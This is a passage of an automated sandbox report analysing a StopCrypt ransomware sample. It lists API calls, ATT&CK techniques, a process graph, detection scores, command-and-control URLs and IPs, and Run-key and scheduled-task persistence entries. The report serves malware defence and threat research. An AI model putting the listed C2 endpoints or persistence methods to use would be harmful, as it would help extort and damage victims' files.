___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,10_2_004335E7
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00427756 cpuid 5_2_00427756
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 1_2_0040B1E4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_0040B1E4
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,5_2_0042FE47
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,5_2_00419F90
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,5_2_00419F90

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Application Shimming1Exploitation for Privilege Escalation1Deobfuscate/Decode Files or Information1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
          Default AccountsCommand and Scripting Interpreter3Registry Run Keys / Startup Folder1Application Shimming1Obfuscated Files or Information3LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Services File Permissions Weakness1Process Injection212Software Packing22Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Masquerading1NTDSSystem Information Discovery24Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptServices File Permissions Weakness1Process Injection212LSA SecretsSecurity Software Discovery141SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonServices File Permissions Weakness1Cached Domain CredentialsProcess Discovery3VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Network Configuration Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 496234 Sample: NZPC0PFaC0.exe Startdate: 04/10/2021 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 Multi AV Scanner detection for submitted file 2->58 60 4 other signatures 2->60 8 NZPC0PFaC0.exe 2->8         started        11 NZPC0PFaC0.exe 2->11         started        13 NZPC0PFaC0.exe 2->13         started        15 NZPC0PFaC0.exe 2->15         started        process3 signatures4 64 Injects a PE file into a foreign processes 8->64 17 NZPC0PFaC0.exe 19 8->17         started        66 Detected unpacking (changes PE section rights) 11->66 68 Detected unpacking (overwrites its own PE header) 11->68 70 Contains functionality to inject code into remote processes 11->70 22 NZPC0PFaC0.exe 1 17 11->22         started        72 Multi AV Scanner detection for dropped file 13->72 74 Machine Learning detection for dropped file 13->74 24 NZPC0PFaC0.exe 13 13->24         started        26 NZPC0PFaC0.exe 13 15->26         started        process5 dnsIp6 48 securebiz.org 123.213.233.194, 49757, 80 SKB-ASSKBroadbandCoLtdKR Korea Republic of 17->48 36 C:\Users\user\Desktop\...\SUAVTZKNFL.jpg, data 17->36 dropped 38 C:\Users\user\Desktop\...\QNCYCDFIJJ.docx, data 17->38 dropped 40 C:\Users\user\Desktop\...\PWCCAWLGRE.pdf, data 17->40 dropped 46 3 other malicious files 17->46 dropped 62 Modifies existing user documents (likely ransomware behavior) 17->62 50 api.2ip.ua 77.123.139.190, 443, 49750, 49751 VOLIA-ASUA Ukraine 22->50 42 C:\Users\user\AppData\...42ZPC0PFaC0.exe, PE32 22->42 dropped 44 C:\Users\...44ZPC0PFaC0.exe:Zone.Identifier, ASCII 22->44 dropped 28 NZPC0PFaC0.exe 22->28         started        31 icacls.exe 22->31         started        file7 signatures8 process9 signatures10 76 Injects a PE file into a foreign processes 28->76 33 NZPC0PFaC0.exe 13 28->33         started        process11 dnsIp12 52 api.2ip.ua 33->52

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          NZPC0PFaC0.exe35%VirustotalBrowse
          NZPC0PFaC0.exe56%ReversingLabsWin32.Ransomware.StopCrypt
          NZPC0PFaC0.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe56%ReversingLabsWin32.Ransomware.StopCrypt

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          10.2.NZPC0PFaC0.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
          16.2.NZPC0PFaC0.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
          12.1.NZPC0PFaC0.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
          10.1.NZPC0PFaC0.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
          5.2.NZPC0PFaC0.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
          16.1.NZPC0PFaC0.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
          13.1.NZPC0PFaC0.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
          12.2.NZPC0PFaC0.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
          13.2.NZPC0PFaC0.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File
          5.1.NZPC0PFaC0.exe.400000.0.unpack100%AviraHEUR/AGEN.1131749Download File

          Domains

          SourceDetectionScannerLabelLink
          securebiz.org18%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
          http://securebiz.org/fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806C0%Avira URL Cloudsafe
          http://www.wikipedia.com/0%URL Reputationsafe
          http://securebiz.org/fhsgtsspen6/get.php19%VirustotalBrowse
          http://securebiz.org/fhsgtsspen6/get.php0%Avira URL Cloudsafe
          https://we.tl/t-1JwFK5rT0%Avira URL Cloudsafe
          https://we.tl/t-1JwFK5rT390%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          securebiz.org
          		123.213.233.194
          		truetrueunknown
          api.2ip.ua
          		77.123.139.190
          		truefalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://securebiz.org/fhsgtsspen6/get.php?pid=F4B58C92E14ED1DB6A495C4F0112806Ctrue
            • Avira URL Cloud: safe
            		unknown
            http://securebiz.org/fhsgtsspen6/get.phptrue
            • 19%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://api.2ip.ua/geo.jsonfalse
              		high

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorNZPC0PFaC0.exe, 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmpfalse
              • Avira URL Cloud: safe
              		low
              http://www.nytimes.com/NZPC0PFaC0.exe, 00000010.00000003.376954535.0000000003500000.00000004.00000010.sdmpfalse
                		high
                https://api.2ip.ua/NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpfalse
                  		high
                  https://api.2ip.ua/geo.jsontNZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpfalse
                    		high
                    https://api.2ip.ua//WjnNZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpfalse
                      		high
                      http://www.youtube.com/NZPC0PFaC0.exe, 00000010.00000003.377220530.0000000003500000.00000004.00000010.sdmpfalse
                        		high
                        https://api.2ip.ua/geo.jsonSNZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpfalse
                          		high
                          https://api.2ip.ua/geo.jsonsNZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpfalse
                            		high
                            http://www.wikipedia.com/NZPC0PFaC0.exe, 00000010.00000003.377181082.0000000003500000.00000004.00000010.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.amazon.com/NZPC0PFaC0.exe, 00000010.00000003.376736269.0000000003500000.00000004.00000010.sdmpfalse
                              		high
                              http://www.live.com/NZPC0PFaC0.exe, 00000010.00000003.376822071.0000000003500000.00000004.00000010.sdmpfalse
                                		high
                                http://www.reddit.com/NZPC0PFaC0.exe, 00000010.00000003.377028462.0000000003500000.00000004.00000010.sdmpfalse
                                  		high
                                  http://www.twitter.com/NZPC0PFaC0.exe, 00000010.00000003.377098240.0000000003500000.00000004.00000010.sdmpfalse
                                    		high
                                    https://we.tl/t-1JwFK5rTNZPC0PFaC0.exe, 00000010.00000002.554664227.000000000078F000.00000004.00000020.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.openssl.org/support/faq.htmlNZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmpfalse
                                      		high
                                      https://api.2ip.ua/geo.jsonCNZPC0PFaC0.exe, 0000000A.00000002.332958697.0000000000890000.00000004.00000020.sdmpfalse
                                        		high
                                        https://we.tl/t-1JwFK5rT39NZPC0PFaC0.exe, 00000010.00000002.554723819.00000000007A9000.00000004.00000020.sdmp, _readme.txt0.16.drtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.google.com/NZPC0PFaC0.exe, 00000010.00000003.376800469.0000000003500000.00000004.00000010.sdmpfalse
                                          		high
                                          https://api.2ip.ua/geo.jsonyZ3NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpfalse
                                            		high

                                            Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public

                                            IPDomainCountryFlagASNASN NameMalicious
                                            123.213.233.194
                                            		securebiz.orgKorea Republic of
                                            		9318SKB-ASSKBroadbandCoLtdKRtrue
                                            77.123.139.190
                                            		api.2ip.uaUkraine
                                            		25229VOLIA-ASUAfalse

                                            General Information

                                            Joe Sandbox Version:33.0.0 White Diamond
                                            Analysis ID:496234
                                            Start date:04.10.2021
                                            Start time:12:28:52
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 13m 6s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Sample file name:NZPC0PFaC0.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:32
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.rans.troj.evad.winEXE@18/166@6/2
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 15% (good quality ratio 14.6%)
                                            • Quality average: 84.7%
                                            • Quality standard deviation: 22%
                                            HCA Information:
                                            • Successful, ratio: 84%
                                            • Number of executed functions: 30
                                            • Number of non-executed functions: 214
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            Show All
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.203.141.148, 52.184.81.210, 2.20.178.10, 2.20.178.56, 20.199.120.151, 52.139.176.199, 2.20.178.33, 2.20.178.24, 20.199.120.182, 20.54.110.249, 40.112.88.60, 20.199.120.85
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, iris-de-prod-azsc-eas.eastasia.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-eas-b.eastasia.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            12:29:59Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe s>--Task
                                            12:29:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe" --AutoStart
                                            12:30:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe" --AutoStart

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            123.213.233.1945TGoW7zb3I.exeGet hashmaliciousBrowse
                                            • fernandomayol.com/upload/
                                            PebQYoO2CS.exeGet hashmaliciousBrowse
                                            • fernandomayol.com/upload/
                                            noJB1GBDPi.exeGet hashmaliciousBrowse
                                            • tbpws.top/files/1/build3.exe
                                            pub2.exeGet hashmaliciousBrowse
                                            • lahuertasonora.com/upload/
                                            77.123.139.190pFhBSJjDob.exeGet hashmaliciousBrowse
                                              tgq9mX1f1t.exeGet hashmaliciousBrowse
                                                vgd1s7O8v0.exeGet hashmaliciousBrowse
                                                  FXhpOKe414.exeGet hashmaliciousBrowse
                                                    s1AKAPm5ng.exeGet hashmaliciousBrowse
                                                      Rpvp21dVJM.exeGet hashmaliciousBrowse
                                                        1P8OFtgxVn.exeGet hashmaliciousBrowse
                                                          pRyr7WvC1o.exeGet hashmaliciousBrowse
                                                            UCx1aUN123.exeGet hashmaliciousBrowse
                                                              TAQTauPyBV.exeGet hashmaliciousBrowse
                                                                Ll1C2dj8k3.exeGet hashmaliciousBrowse
                                                                  2jCSs3DMYt.exeGet hashmaliciousBrowse
                                                                    i1tlQVzhoo.exeGet hashmaliciousBrowse
                                                                      xBqF1ymutp.exeGet hashmaliciousBrowse
                                                                        nEOMKj4lpU.exeGet hashmaliciousBrowse
                                                                          yqz3R4D44O.exeGet hashmaliciousBrowse
                                                                            HRjfZA7xlX.exeGet hashmaliciousBrowse
                                                                              fjVlh3wWfw.exeGet hashmaliciousBrowse
                                                                                VVxkAiANoH.exeGet hashmaliciousBrowse
                                                                                  MYJR0Ln7E8.exeGet hashmaliciousBrowse

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    securebiz.orgpFhBSJjDob.exeGet hashmaliciousBrowse
                                                                                    • 189.129.114.216
                                                                                    tgq9mX1f1t.exeGet hashmaliciousBrowse
                                                                                    • 61.98.7.133
                                                                                    FXhpOKe414.exeGet hashmaliciousBrowse
                                                                                    • 211.169.6.249
                                                                                    s1AKAPm5ng.exeGet hashmaliciousBrowse
                                                                                    • 61.98.7.132
                                                                                    1P8OFtgxVn.exeGet hashmaliciousBrowse
                                                                                    • 190.141.221.166
                                                                                    pRyr7WvC1o.exeGet hashmaliciousBrowse
                                                                                    • 190.141.221.166
                                                                                    TAQTauPyBV.exeGet hashmaliciousBrowse
                                                                                    • 201.124.21.227
                                                                                    i1tlQVzhoo.exeGet hashmaliciousBrowse
                                                                                    • 201.124.21.227
                                                                                    yqz3R4D44O.exeGet hashmaliciousBrowse
                                                                                    • 31.166.224.38
                                                                                    fjVlh3wWfw.exeGet hashmaliciousBrowse
                                                                                    • 217.156.87.2
                                                                                    VVxkAiANoH.exeGet hashmaliciousBrowse
                                                                                    • 41.41.255.235
                                                                                    MYJR0Ln7E8.exeGet hashmaliciousBrowse
                                                                                    • 222.236.49.124
                                                                                    V2dk1e5Wbs.exeGet hashmaliciousBrowse
                                                                                    • 14.51.96.70
                                                                                    3jJa7lvi9n.exeGet hashmaliciousBrowse
                                                                                    • 106.243.14.107
                                                                                    5G5rCXDzBl.exeGet hashmaliciousBrowse
                                                                                    • 190.191.199.190
                                                                                    o7LBymBKPE.exeGet hashmaliciousBrowse
                                                                                    • 211.169.6.249
                                                                                    CwnZiHC5wY.exeGet hashmaliciousBrowse
                                                                                    • 109.98.58.98
                                                                                    Uyy2a3HdNc.exeGet hashmaliciousBrowse
                                                                                    • 121.136.102.4
                                                                                    BXTOD28N3I.exeGet hashmaliciousBrowse
                                                                                    • 186.74.208.84
                                                                                    NC7bm1PoKj.exeGet hashmaliciousBrowse
                                                                                    • 211.59.14.90
                                                                                    api.2ip.uapFhBSJjDob.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    tgq9mX1f1t.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    vgd1s7O8v0.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    FXhpOKe414.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    s1AKAPm5ng.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    Rpvp21dVJM.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    1P8OFtgxVn.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    pRyr7WvC1o.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    UCx1aUN123.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    TAQTauPyBV.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    Ll1C2dj8k3.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    2jCSs3DMYt.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    i1tlQVzhoo.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    xBqF1ymutp.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    nEOMKj4lpU.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    yqz3R4D44O.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    HRjfZA7xlX.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    fjVlh3wWfw.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    VVxkAiANoH.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    MYJR0Ln7E8.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190

                                                                                    ASN

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                    SKB-ASSKBroadbandCoLtdKRZot0D0dD8JGet hashmaliciousBrowse
                                                                                    • 218.51.113.122
                                                                                    8qv45JJrGQGet hashmaliciousBrowse
                                                                                    • 180.67.137.248
                                                                                    lessie.armGet hashmaliciousBrowse
                                                                                    • 1.248.5.0
                                                                                    JrwofcjXNiGet hashmaliciousBrowse
                                                                                    • 39.118.64.158
                                                                                    GGypCWURD4Get hashmaliciousBrowse
                                                                                    • 210.94.10.69
                                                                                    3FjsOtbeXqGet hashmaliciousBrowse
                                                                                    • 118.223.194.8
                                                                                    NazNIp21XuGet hashmaliciousBrowse
                                                                                    • 175.114.121.199
                                                                                    p83BktbXwe.exeGet hashmaliciousBrowse
                                                                                    • 221.139.49.11
                                                                                    4ZfdpLEQn1.exeGet hashmaliciousBrowse
                                                                                    • 221.139.49.11
                                                                                    zMO1n8NAdk.exeGet hashmaliciousBrowse
                                                                                    • 221.139.49.11
                                                                                    02uKvQqAqDGet hashmaliciousBrowse
                                                                                    • 58.122.243.187
                                                                                    834V8Sq5HQGet hashmaliciousBrowse
                                                                                    • 219.254.47.121
                                                                                    4uSa8tiph0Get hashmaliciousBrowse
                                                                                    • 114.203.153.29
                                                                                    CdGi0KyPWXGet hashmaliciousBrowse
                                                                                    • 116.127.172.162
                                                                                    djRl6t3LqhGet hashmaliciousBrowse
                                                                                    • 175.122.34.242
                                                                                    K7LFt7aJF5Get hashmaliciousBrowse
                                                                                    • 175.113.47.43
                                                                                    18a991ca66e5a2f3ba4b92dd18171eaa5f7306b8cd7d9.exeGet hashmaliciousBrowse
                                                                                    • 58.124.228.242
                                                                                    tgq9mX1f1t.exeGet hashmaliciousBrowse
                                                                                    • 61.98.7.133
                                                                                    FXhpOKe414.exeGet hashmaliciousBrowse
                                                                                    • 61.98.7.133
                                                                                    s1AKAPm5ng.exeGet hashmaliciousBrowse
                                                                                    • 61.98.7.132
                                                                                    VOLIA-ASUApFhBSJjDob.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    LRLZJUXBPkGet hashmaliciousBrowse
                                                                                    • 93.77.9.183
                                                                                    7yIx6ZIBpIGet hashmaliciousBrowse
                                                                                    • 93.77.48.1
                                                                                    0sf31umxYWGet hashmaliciousBrowse
                                                                                    • 93.75.97.63
                                                                                    tgq9mX1f1t.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    vgd1s7O8v0.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    FXhpOKe414.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    s1AKAPm5ng.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    Rpvp21dVJM.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    1P8OFtgxVn.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    pRyr7WvC1o.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    UCx1aUN123.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    TAQTauPyBV.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    Ll1C2dj8k3.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    2jCSs3DMYt.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    i1tlQVzhoo.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    xBqF1ymutp.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    nEOMKj4lpU.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190
                                                                                    ozJy5Zf5cf.exeGet hashmaliciousBrowse
                                                                                    • 91.203.5.165
                                                                                    yqz3R4D44O.exeGet hashmaliciousBrowse
                                                                                    • 77.123.139.190

                                                                                    JA3 Fingerprints

